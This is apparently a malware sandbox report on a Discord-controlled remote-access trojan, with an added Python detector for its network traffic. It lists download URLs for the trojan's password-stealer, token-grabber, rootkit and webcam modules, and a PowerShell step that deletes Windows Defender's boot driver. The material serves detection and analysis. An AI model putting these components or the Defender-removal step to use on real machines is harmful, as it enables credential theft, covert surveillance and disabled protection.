          Source: Binary string: System.Xml.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb& source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb| source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb_ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bang_executor.PDB@ source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: b77a5c561934e089\mscorlib.pdb>w0 source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BA7000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbj source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb8 source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb3 source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb@k source: WERF485.tmp.dmp.34.dr
          Source: Binary string: bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pC:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.pdb< source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbicy source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdbpHp source: WERB52A.tmp.dmp.25.dr
          Source: Binary string: indoC:\Windows\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004EC4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004FE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: aYUnNI1T2trVUmXeoUmoSw==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: +ZQ8YwwGC+gtFcLWIAD8fQ==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: Du49Via+t800c0yCUOPmaQ==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: Joe Sandbox View IP Address: 162.159.136.234 162.159.136.234
          Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: aYUnNI1T2trVUmXeoUmoSw==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: +ZQ8YwwGC+gtFcLWIAD8fQ==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            GET /?v=9&encording=json HTTP/1.1
            Connection: Upgrade,Keep-Alive
            Upgrade: websocket
            Sec-WebSocket-Key: Du49Via+t800c0yCUOPmaQ==
            Sec-WebSocket-Version: 13
            Host: gateway.discord.gg
          Source: unknown DNS traffic detected: queries for: gateway.discord.gg
          Source: global traffic HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Thu, 15 Feb 2024 17:14:52 GMT
            Content-Length: 0
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gf5S58277ctmcHDr2F3eKBmVHGRh%2BLXS1%2BE5PO504UiM7awvLASVT61pRN89tvvA5abcG1wv0UC2IymOWJ%2Bs5aFnRfJSS8JJgWD9pfhMdb5wyrGMDcBVUmm%2BnjEwsW%2FStr3G9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 855f308f3b314315-EWR
          Source: global traffic HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Thu, 15 Feb 2024 17:14:52 GMT
            Content-Length: 0
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjEZVX6W2%2F7LeJAGd%2FLHKuQUR7qHPoRvppXrG4MiNbinv7vxjGwJjmW5N93qHkPsRtrsZ%2BbGo3xHovXoVizw0bo37XaVi2MVt7B4UBcb%2FQN%2BT0Yf4o9W7%2FRpalWvyPnalAKP8w%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 855f3090ecdc43b6-EWR
          Source: global traffic HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Thu, 15 Feb 2024 17:15:00 GMT
            Content-Length: 0
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DlNrVeh4%2FAHe4zGlXnfoRcTO0xUuNb1iwAP4JwQtjPUG0Nebl9oSCwBIWYcUWzOiPbKcfFg7M%2BqvkwDJULOKzJik0GCZUeEJRvlLa4D040Q14yzfKjcUUSZ95DPJnu4F0ghAzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 855f30c13afb8c9c-EWR
          Source: global traffic HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Thu, 15 Feb 2024 17:15:09 GMT
            Content-Length: 0
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDjwJ6%2FAcpprXBh%2BLBImLVkoqsgddK96zslF6O1jFcimiwsKpVeEE8TqaM4KEo0SbP1wju1oGZwq8BYrx2mz8p6RTmpdNFzmFz7dtPpEa9KImtjalUpvIpBIF9s2vXERSFp0wg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 855f30f648580f7f-EWR
          Source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
          Source: bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
          Source: bang_executor.exe, 00000003.00000002.1775906377.00000230000B5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87F05000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D715000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gateway.discord.gg
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, executer.exe, 00000004.00000002.1629460687.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.25.dr String found in binary or memory: http://upx.sf.net
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr String found in binary or memory: http://www.google.com/maps/place/
          Source: bang_executor.exe.0.dr String found in binary or memory: https://discord.com/api/v9/channels/
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://discord.com/api/v9/guilds/
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://file.io/
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gateway.discord.gg
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gateway.discord.gg/?v=9&encording=json
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gateway.discord.gg/?v=9&encording=jsonX
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://geolocation-db.com/json
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknown HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49751 version: TLS 1.2
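          The four client handshakes recorded above are WebSocket upgrades to gateway.discord.gg whose query string spells the encoding parameter as `encording`; the parameter the Discord gateway documents is `encoding`, so a Discord client library that is working correctly never sends this form, which makes the misspelling a cheap, high-precision indicator to pair with the Host and Upgrade headers. The same memory dumps also carry download URLs under raw.githubusercontent.com/moom825/Discord-RAT-2.0/. The detector below is an added example written for this page, not code from the report, the sandbox, or the RAT; it assumes a constructed one-request-per-line log format in which the request line and its headers are separated by " | ", and the sample log embedded in it is constructed from the handshake and URLs listed above.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report above: the gateway host of the handshake and
# the Discord-RAT-2.0 resource URLs embedded in the sample. Nothing here is
# taken from the RAT's own code.
DISCORD_GATEWAY_HOST = "gateway.discord.gg"
RAT_RESOURCE_PREFIX = "https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/"

# The documented query parameter is 'encoding'; the sample sends 'encording'.
MISSPELLED_ENCODING_PARAM = "encording"


@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str


def parse_request(line: str):
    """Parse one line of the constructed log format assumed here:
    'METHOD target HTTP/x.y | Header: value | Header: value ...'.
    Returns None for lines that are not HTTP requests."""
    parts = [p.strip() for p in line.split(" | ")]
    m = re.match(r"^([A-Z]+)\s+(\S+)\s+HTTP/\d\.\d$", parts[0])
    if not m:
        return None
    headers = {}
    for field in parts[1:]:
        name, sep, value = field.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "target": m.group(2), "headers": headers}


def is_websocket_upgrade(req) -> bool:
    """RFC 6455 client handshake: Upgrade: websocket plus a Connection token 'upgrade'."""
    h = req["headers"]
    upgrade = h.get("upgrade", "").lower() == "websocket"
    tokens = {t.strip().lower() for t in h.get("connection", "").split(",")}
    return upgrade and "upgrade" in tokens


def check_request(line_no: int, line: str) -> list:
    """Return the findings for one log line (empty list if nothing matched)."""
    req = parse_request(line)
    if req is None:
        return []
    findings = []
    host = req["headers"].get("host", "").lower()
    target = req["target"]

    if host == DISCORD_GATEWAY_HOST and is_websocket_upgrade(req):
        query = parse_qs(urlsplit(target).query)
        if MISSPELLED_ENCODING_PARAM in query:
            findings.append(Finding(line_no,
                "Discord gateway WebSocket handshake with misspelled "
                "'encording' parameter (matches the sample's handshake)"))

    # Rebuild the absolute URL so the RAT resource download is caught whether
    # the log stores origin-form or absolute-form request targets.
    absolute = target if target.startswith("http") else f"https://{host}{target}"
    if absolute.startswith(RAT_RESOURCE_PREFIX):
        findings.append(Finding(line_no,
            "download of a Discord-RAT-2.0 resource from the upstream GitHub repository"))
    return findings


def scan_log(text: str) -> list:
    """Run check_request over every non-empty line; line numbers start at 1."""
    out = []
    for n, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            out.extend(check_request(n, line))
    return out


# Constructed sample log: line 1 reproduces the report's handshake, line 2 is a
# correctly spelled handshake as a working client would send it, line 3 is
# unrelated traffic, line 4 is one of the resource URLs found in the sample.
SAMPLE_LOG = """\
GET /?v=9&encording=json HTTP/1.1 | Connection: Upgrade,Keep-Alive | Upgrade: websocket | Sec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g== | Sec-WebSocket-Version: 13 | Host: gateway.discord.gg
GET /?v=9&encoding=json HTTP/1.1 | Connection: Upgrade | Upgrade: websocket | Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== | Sec-WebSocket-Version: 13 | Host: gateway.discord.gg
GET /index.html HTTP/1.1 | Host: example.com | Connection: keep-alive
GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll HTTP/1.1 | Host: raw.githubusercontent.com
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}")
```

          Only lines 1 and 4 of the sample fire; the correctly spelled handshake on line 2 is what a legitimate Discord client sends and must stay clean, which is why the check keys on the misspelling rather than on the gateway host alone. The hosts contacted here are Cloudflare-fronted Discord and GitHub infrastructure, so blocking by IP (162.159.136.234 above) is not a useful response; the request content is.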

          E-Banking Fraud

          Source: Yara match File source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED

          System Summary

          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Process created: Commandline size = 3122
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004E7FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\System32\drivers\wd\WdBoot.sys
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004EF963
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004E9906
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F8C7E
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_00514044
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F60F7
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F9111
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F2125
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F82D0
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004EE394
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F6445
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F1476
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F976F
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_00507738
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F0949
